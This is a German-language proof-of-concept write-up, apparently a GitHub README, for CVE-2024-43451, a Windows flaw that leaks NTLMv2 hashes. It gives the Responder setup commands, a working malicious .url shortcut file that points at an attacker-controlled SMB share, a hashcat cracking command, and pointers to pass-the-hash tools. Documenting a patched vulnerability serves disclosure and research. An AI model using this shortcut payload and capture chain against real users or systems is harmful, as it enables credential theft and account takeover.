
CVE-2024-43451 ist eine Windows-NTLM-Sicherheitslücke, die es einem Angreifer ermöglicht, Authentifizierung zu erzwingen und NTLM-Hashes mittels bösartiger Verknüpfungen zu erfassen.
CVE-2024-43451 ist eine Zero-Day-Sicherheitslücke in Microsoft Windows, die Angreifern ermöglicht, NTLMv2-Passwort-Hashes mit minimaler Benutzerinteraktion zu erfassen, was potenziell zum Diebstahl von Anmeldedaten führen kann. Eine häufig ausgenutzte Methode besteht darin, die NTLM-Authentifizierung über SMB-Verbindungen zu einem entfernten Server zu nutzen, um den Hash zu erfassen. Diese Sicherheitslücke wurde in den Updates vom November 2024 behoben. Benutzern wird empfohlen, die entsprechenden Sicherheitsupdates anzuwenden, um das Risiko zu mindern.
Dieser Angriff wurde entdeckt, als er aktiv über eine Phishing-E-Mail ausgenutzt wurde, die von einem kompromittierten ukrainischen Regierungsserver gesendet wurde. Die E-Mail enthält eine bösartige URL-Datei. Wenn der Benutzer mit der Datei interagiert, indem er sie mit der rechten Maustaste anklickt, löscht oder verschiebt, wird die Sicherheitslücke aktiviert. Dies löst eine Verbindung zum Server des Angreifers aus, was zum Herunterladen weiterer schädlicher Dateien führt, wie z. B. der SparkRAT-Malware (ein Open-Source-Remote-Zugriffstrojaner, der dem Angreifer die Kontrolle über das System des Opfers ermöglicht).
NTLMv2 ist derzeit die sicherste Version und heute am relevantesten.
image
Um eine funktionierende Umgebung für diesen POC zu schaffen, müssen wir eine Ziel-Windows-Maschine mit einer Build-Nummer, die vor November 2024 veröffentlicht wurde, und einen entfernten Server zum Simulieren des Hash-Einfangs einrichten:
Responder herunter und installieren Sie es, um den Hash über SMB zu erfassen:
brew install python3
git clone https://github.com/lgandx/Responder.git
cd Responder
sudo python3 Responder.py -I <put your network interface> -v
\\(remote server IP) eingeben:
Da der Exploit lediglich eine SMB-Verbindung zum entfernten Server herstellen muss, können wir eine einfache Datei verwenden, um dies zu simulieren:
[InternetShortcut]
URL=\\(remote server IP)\share
IconIndex=32
IconFile=C:\Windows\System32\shell32.dll
Sobald die Datei vorbereitet und an das Zielsystem übergeben wurde, erfordert das Stehlen des Hashs nur minimale Benutzerinteraktion. Diese Interaktion kann eine der folgenden Aktionen umfassen:
https://github.com/user-attachments/assets/fd6389b5-4ee9-4d90-a76e-562394b24058
https://github.com/user-attachments/assets/b820ea73-b0fc-40f1-920e-28cf7869f1e2
Mit dem unverschlüsselten Hash in der Hand können wir entweder versuchen, ihn zu knacken, um das Klartext-Passwort zu enthüllen
oder ihn in einem „Pass-the-Hash“-Angriff mit Tools wie Mimikatz oder Metasploit verwenden.
In unserem Fall enthüllt ein einfacher Hashcat-Befehl mein Passwort:
hashcat -m 5600 leak.txt rockyou.txt
